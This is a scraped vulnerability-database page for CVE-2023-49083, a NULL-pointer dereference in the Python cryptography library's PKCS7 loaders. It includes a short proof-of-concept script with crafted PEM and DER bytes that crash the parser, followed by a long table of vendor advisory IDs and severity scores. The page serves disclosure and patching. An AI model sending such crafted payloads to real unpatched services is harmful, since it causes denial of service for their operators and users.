CVE-2023-49083
ADVISORY - githubSummary
Summary
Calling load_pem_pkcs7_certificates or load_der_pkcs7_certificates could lead to a NULL-pointer dereference and segfault.
PoC
Here is a Python code that triggers the issue:
from cryptography.hazmat.primitives.serialization.pkcs7 import load_der_pkcs7_certificates, load_pem_pkcs7_certificates
pem_p7 = b"""
-----BEGIN PKCS7-----
MAsGCSqGSIb3DQEHAg==
-----END PKCS7-----
"""
der_p7 = b"\x30\x0B\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x02"
load_pem_pkcs7_certificates(pem_p7)
load_der_pkcs7_certificates(der_p7)
Impact
Exploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability.
EPSS Score: 0.00445 (0.625)
Common Weakness Enumeration (CWE)
ADVISORY - nist
NULL Pointer Dereference
ADVISORY - github
NULL Pointer Dereference
ADVISORY - gitlab
ADVISORY - redhat
NULL Pointer Dereference
NIST
CREATED
UPDATED
ADVISORY IDCVE-2023-49083
EXPLOITABILITY SCORE
2.2
EXPLOITS FOUND
COMMON WEAKNESS ENUMERATION (CWE)
CVSS SCORE
5.9mediumGitHub
CREATED
UPDATED
ADVISORY IDGHSA-jfhm-5ghh-2f97
EXPLOITABILITY SCORE
2.2
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CVSS SCORE
5.9mediumDebian
CREATED
UPDATED
ADVISORY IDCVE-2023-49083
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Ubuntu
CREATED
UPDATED
ADVISORY IDCVE-2023-49083
EXPLOITABILITY SCORE
3.9
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
7.5mediumPypA
CREATED
UPDATED
ADVISORY ID
PYSEC-2023-254
EXPLOITABILITY SCORE
3.9
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
7.5highAlma
CREATED
UPDATED
ADVISORY IDALSA-2024:2337
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AmediumAlma
CREATED
UPDATED
ADVISORY IDALSA-2024:3105
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AmediumAmazon
CREATED
UPDATED
ADVISORY IDALAS2023-2023-446
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AmediumRed Hat
CREATED
UPDATED
ADVISORY IDCVE-2023-49083
EXPLOITABILITY SCORE
3.9
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CVSS SCORE
7.5mediumRocky
CREATED
UPDATED
ADVISORY IDRLSA-2024:2337
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AlowRocky
CREATED
UPDATED
ADVISORY IDRLSA-2024:3105
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AlowOracle
CREATED
UPDATED
ADVISORY IDELSA-2024-12078
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AhighOracle
CREATED
UPDATED
ADVISORY IDELSA-2024-12079
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AhighOracle
CREATED
UPDATED
ADVISORY IDELSA-2024-12234
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AmediumOracle
CREATED
UPDATED
ADVISORY IDELSA-2024-19480
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AmediumOracle
CREATED
UPDATED
ADVISORY IDELSA-2024-2337
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AmediumOracle
CREATED
UPDATED
ADVISORY IDELSA-2024-3105
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
N/AmediumChainguard
CREATED
UPDATED
ADVISORY ID
CGA-ww2v-8w75-whg8
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Photon
CREATED
UPDATED
ADVISORY ID
CVE-2023-49083
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
5.9mediumintheWild
CREATED
UPDATED
ADVISORY IDCVE-2023-49083
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-